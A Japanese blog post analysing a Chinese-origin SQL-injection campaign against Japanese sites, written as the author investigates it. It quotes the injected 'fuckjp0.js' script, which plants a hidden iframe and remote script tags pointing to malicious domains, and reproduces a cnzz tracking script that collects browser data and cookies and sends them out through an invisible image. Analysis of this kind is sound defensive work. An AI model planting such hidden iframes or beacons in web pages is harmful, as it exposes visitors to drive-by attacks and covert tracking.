中国からの攻撃?
注意:みだりに URL にアクセスしにいかないこと。
LAC のアナウンスをもとにググってみた。
埋め込まれるスクリプトタグのソースに含まれるドメイン名をググル先生に食わせてみた結果
fuckjp0.js っつう愉快なファイル名のスクリプトの中身
document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.hanjapass.com\/sian\/intro\/jp\/jp.htm\'><\/iframe>"); document.writeln("<SCRIPT language=JavaScript src=\"http:\/\/s16.cnzz.com\/stat.php?id=808572&web_id=808572\" charset=gb2312><\/SCRIPT>");
この中の「http://www.hanjapass.com/sian/intro/jp/jp.htm」は文字化けで読めず。手元で見られるエンコードで試したけど全部だめだった。US-ACIIだと主張しているけどなんか違う。ローカルに保存してバイナリエディタで開いてみたけど,BODY部に何かヘッダが入っている様子もなく。
もう一つの「http://s16.cnzz.com/stat.php?id=808572&web_id=808572」は中身が見られた。
var expireDate=new Date();var hours=expireDate.getHours();var minutes=expireDate.getMinutes();var seconds=expireDate.getSeconds();var now=expireDate.getTime(); function getCookieVal_cnzz (offset){var endstr = document.cookie.indexOf(";",offset);if(endstr==-1){endstr=document.cookie.length;}return unescape(document.cookie.substring(offset,endstr));} function GetCookie_cnzz(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0; while(i< clen){ var j=i+alen; if(document.cookie.substring(i,j)==arg) return getCookieVal_cnzz(j); i=document.cookie.indexOf(" ",i) + 1; if(i==0)break;} return null;} var agt=navigator.userAgent.toLowerCase(); data='&agt='+escape(agt)+'&r='+escape(document.referrer)+ '&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage) + '&OS=' + escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.56175700 1206424701'; cnzz_a=GetCookie_cnzz("cnzz02"); if(cnzz_a!=null){cnzz_a=parseInt(cnzz_a);cnzz_a=cnzz_a+1;}else{cnzz_a=0;} data=data+'&repeatip='+cnzz_a;rtime=GetCookie_cnzz("rtime");ltime=GetCookie_cnzz("ltime");cnzz_eid=GetCookie_cnzz("cnzz_eid"); if(cnzz_eid == null){cnzz_eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;} if(ltime< 1000000){rtime=0;ltime=0;}else{rtime=parseInt(rtime);} if(rtime< 1) rtime=0; ltime=parseInt(ltime); now=parseInt(now); if(((now-ltime)>43200*1000)&&(ltime>0)) rtime=rtime+1 ; data=data+'&rtime='+rtime+'&cnzz_eid='+escape(cnzz_eid); data=data+'&showp='+escape(screen.width+'x'+screen.height) ; document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=808572" target=_blank title="ユセウ、ヘウシニ">ユセウ、ヘウシニ</a>'); document.write('<img src="http://s16.cnzz.com/stat.htm?id=808572'+ data +'" border="0" width="0" height="0">'); var lefttime=1000*(86400-hours*3600-minutes*60-seconds);expireDate.setTime(expireDate.getTime() + 500*86400);document.cookie="cnzz02="+cnzz_a+"; expires="+expireDate.toGMTString()+ "; path=/"; var lefttime=1000*86400*182;expireDate.setTime(now + lefttime);document.cookie="rtime="+rtime+";expires="+expireDate.toGMTString()+ ";path=/";document.cookie="ltime="+now+";expires=" + expireDate.toGMTString()+ ";path=/";document.cookie="cnzz_eid="+escape(cnzz_eid)+ ";expires="+expireDate.toGMTString()+";path=/";
fuckjp.js ってパターンもあって,そっちからは「http://www.2117966.com/cuteqq.htm」にリンクしようとするんだけど,これも死んでるみたい。
昨日からのじゃなくて,もっと前の痕跡しか見つからないみたいだねえ。
ちなみにウチの鯖には痕跡がない。そもそもデータベースと連携するような WEB コンテンツ置いてないとか ASP なんか使ってないってのもあるけど,ログにも残っていないし。単なるツールでポンの無差別じゃなくて,あらかじめ通じそうなところかどうか調べてから撃ってるのかな。だとしたらちょっと面倒かもしれんなあ。ツールでポンの単純なお子様が相手って訳じゃないとなると,それなりに考えて動く必要がある。
忙しいのでまたあとで。とりあえずはうろたんだーラジオ見てまったりしようぜ。